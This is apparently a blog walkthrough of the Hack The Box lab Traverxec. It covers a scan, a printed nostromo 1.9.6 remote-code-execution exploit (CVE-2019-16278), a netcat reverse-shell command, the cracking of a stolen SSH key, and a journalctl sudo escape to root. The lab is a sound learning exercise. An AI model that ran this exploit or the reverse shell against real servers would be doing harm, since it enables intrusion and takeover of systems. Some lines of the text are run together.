Hack the Box: Traverxec
10 min readSep 12, 2020
Everything is a copy of a copy of a copy.
- Chuck Palahniuk, Fight Club
We are going to pwn Traverxec by jkr from Hack The Box. Getting User shell is fun and by using GTFOBins correctly we can get Root easily.
Enumeration
We start with our basic portscan of the box.
kali@kali:~$ nmap -sC -sV -oA SecNotes -vv — script vuln 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2020–04–10 03:38 EDT
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:38
Completed NSE at 03:38, 10.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:38
Completed NSE at 03:38, 0.00s elapsed
Initiating Ping Scan at 03:38
Scanning 10.10.10.165 [2 ports]
Completed Ping Scan at 03:38, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:38
Completed Parallel DNS resolution of 1 host. at 03:38, 0.08s elapsed
Initiating Connect Scan at 03:38
Scanning 10.10.10.165 [1000 ports]
Discovered open port 80/tcp on 10.10.10.165
Discovered open port 22/tcp on 10.10.10.165
Completed Connect Scan at 03:38, 17.83s elapsed (1000 total ports)
Initiating Service scan at 03:38
Scanning 2 services on 10.10.10.165
Completed Service scan at 03:39, 6.87s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.165.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:39
NSE: [firewall-bypass 10.10.10.165] lacks privileges.
NSE Timing: About 98.89% done; ETC: 03:39 (0:00:00 remaining)
NSE Timing: About 99.26% done; ETC: 03:40 (0:00:00 remaining)
NSE Timing: About 99.26% done; ETC: 03:40 (0:00:01 remaining)
NSE Timing: About 99.26% done; ETC: 03:41 (0:00:01 remaining)
NSE Timing: About 99.63% done; ETC: 03:41 (0:00:01 remaining)
Completed NSE at 03:41, 154.76s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:41
NSE: [tls-ticketbleed 10.10.10.165:80] Not running due to lack of privileges.
Completed NSE at 03:41, 2.05s elapsed
Nmap scan report for 10.10.10.165
Host is up, received syn-ack (0.24s latency).
Scanned at 2020–04–10 03:38:37 EDT for 182s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http syn-ack nostromo 1.9.6
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.165
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.165:80/
| Form id: contact-name
|_ Form action: empty.html
|_http-dombased-xss: Couldn’t find any DOM based XSS.
|_http-jsonp-detection: Couldn’t find any JSONP endpoints.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007–6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server’s resources causing Denial Of Service.
|
| Disclosure date: 2009–09–17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007–6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
| http-vuln-cve2011–3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011–3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011–08–19
| References:
| https://www.tenable.com/plugins/nessus/55976
| https://www.securityfocus.com/bid/49303
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn’t find wp-login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelNSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:41
Completed NSE at 03:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:41
Completed NSE at 03:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.64 seconds
Also the nmap reveals its nostromo 1.9.6
Checking for the exploits for the webserver. I found a exploit with CVE-2019–16278.
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278
#!/usr/bin/env pythonimport sys
import socketart = """ _____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/ """help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'def connect(soc):
response = ""
try:
while True:
connection = soc.recv(1024)
if len(connection) == 0:
break
response += connection
except:
pass
return responsedef cve(target, port, cmd):
soc = socket.socket()
soc.connect((target, int(port)))
payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
soc.send(payload)
receive = connect(soc)
print(receive)if __name__ == "__main__": print(art)
try:
target = sys.argv[1]
port = sys.argv[2]
cmd = sys.argv[3] cve(target, port, cmd)
except IndexError:
print(help_menu)cp /usr/share/exploitdb/exploits/multiple/remote/47837.py /root/machines/traverxecpython 47837.py
We see there are 3 required parameters :
- Target ip address (10.10.10.165)
- Target Port (80)
- Command to execute (ex. Whoami).
python 47837.py 10.10.10.165 80 whoami
As we see … we could execute commands to the remote server using the script from exploitdb. Lets try and see if we can get ourselves a reverse shell to have a better experience while running commands on the remote server.
We are going to use netcat to do this…
python 47837.py 10.10.10.165 80 “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 9001 >/tmp/f”
We have a reverse shell on the remote server as www-data. From now we can try and enumerate the webserver in /var/nostromo :
www-data@traverxec:/var/nostromo/conf$ ls -la
ls -la
total 20
drwxr-xr-x 2 root daemon 4096 Oct 27 16:12 .
drwxr-xr-x 6 root root 4096 Oct 25 14:43 ..
-rw-r--r-- 1 root bin 41 Oct 25 15:20 .htpasswd
-rw-r--r-- 1 root bin 2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin 498 Oct 25 15:20 nhttpd.confThere seems to be the conf folder which may include possible information on how to escalate to user.
Reading nhttpd.conf file We see a lot of information :
We can see that david which is also an user in the current machine seems to have been configured as the server admin, and more than that we can see that the public_www folder is located in /home
While we tried to enumerate … there was no such public_www in /home :
But since we saw : david was the server admin , the public_www should probably be inside his folder too. We cannot actually list the files inside david home folder but we can try to directly access the mentioned directory as www-data and see if we can find something else :
As expected , we could directly access : public_www and we see the index.html file alongside an interesting directory claiming to hold protected files .
We can list all the files in ~david then:
www-data@traverxec:/var/nostromo/conf$ ls /home/david/public_www
index.html protected-file-areaLet’s see what’s in there:
www-data@traverxec:/var/nostromo/conf$ ls /home/david/public_www/protected-file-area
backup-ssh-identity-files.tgzLet’s move to /tmp and extract it:
www-data@traverxec:/tmp$ tar zvxf /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pubLooks like we have an encrypted ssh key:
www-data@traverxec:/tmp/home/david/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4FseyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
-----END RSA PRIVATE KEY-----
Let’s copy it on our machine and try to crack it with John:
$ ssh2john.py id_rsa > id_rsa.hash
$ john --wordlist=lists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2019-11-21 18:03) 0.4329g/s 6208Kp/s 6208Kc/s 6208KC/s *7¡Vamos!
Session completedEscalation to user
Let’s try to use it to get a shell as david:
$ ssh david@10.10.10.165 -i id_rsa
The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established.
ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.165' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$And we got user!
Escalation to root
Now, I have to confess that turn around for many hours before finding something and, let me say that I had to resort to help in a forum. On the david’s folder, there’s a directory by the name “bin”. Inside there’s a sh file with an interesting command.
david@traverxec:~/bin$ ls -la
total 24
drwx------ 2 david david 4096 Mar 8 09:33 .
drwx--x--x 6 david david 4096 Mar 8 09:42 ..
-rw------- 1 david david 1460 Mar 8 09:33 nano.save
-rw------- 1 david david 1460 Mar 8 09:33 nano.save.1
-r-------- 1 david david 802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bashcat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
The last line seems to be executed with superuser permissions. I try to launch it on the shell and I can, but, if I try to change some args, the system asks to me for the password (yes, I try with the one found before, but as I said, it doesn’t work).
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:29:23 EDT. --
Mar 08 10:26:47 traverxec sudo[1781]: www-data : command not allowed ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=list
Mar 08 10:26:58 traverxec sudo[1788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/
Mar 08 10:27:08 traverxec sudo[1788]: www-data : command not allowed ; TTY=pts/5 ; PWD=/tmp ; USER=root ; COMMAND=list
Mar 08 10:27:15 traverxec su[1793]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/5 ruser=w
Mar 08 10:27:17 traverxec su[1793]: FAILED SU (to root) www-data on pts/5
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n6 -unostromo.service
[sudo] password for david:
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl
[sudo] password for david:
david@traverxec:~/bin$The important tip that I read in the forum, was about the GTFOBins SUID, that I don’t know. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. Nice, so I understand that I can search here something I can use to exploit a permission’s elevation and, fortunately, I found the journalctl command.
https://gtfobins.github.io/gtfobins/journalctl/
Ok, I think should be done; last steps and the second flag will be mine.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:36:07 EDT. --
Mar 08 10:30:37 traverxec su[1843]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/6 ruser=w
Mar 08 10:30:39 traverxec su[1843]: FAILED SU (to david) www-data on pts/6
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): conversation failed
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Mar 08 10:35:17 traverxec sudo[2080]: www-data : user NOT in sudoers ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=/usr/bin
!/bin/sh
# ls -l
total 16
-rw------- 1 david david 1460 Mar 8 09:33 nano.save
-rw------- 1 david david 1460 Mar 8 09:33 nano.save.1
-r-------- 1 david david 802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
# ls -la /root
total 68
drwx------ 3 root root 4096 Mar 8 09:46 .
drwxr-xr-x 18 root root 4096 Oct 25 14:17 ..
lrwxrwxrwx 1 root root 9 Oct 25 16:21 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw------- 1 root root 47 Mar 8 09:46 .lesshst
drwxr-xr-x 3 root root 4096 Nov 12 04:00 .local
-rw-r--r-- 1 root root 37520 Oct 25 14:43 nostromo_1.9.6-1.deb
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Oct 25 16:21 root.txt
# cat /root/root.txt
9********************6Hope you guys have got something to learn from my approach. Have any issue and question please let me know in the comment section. Thanks for reading this walkthrough.
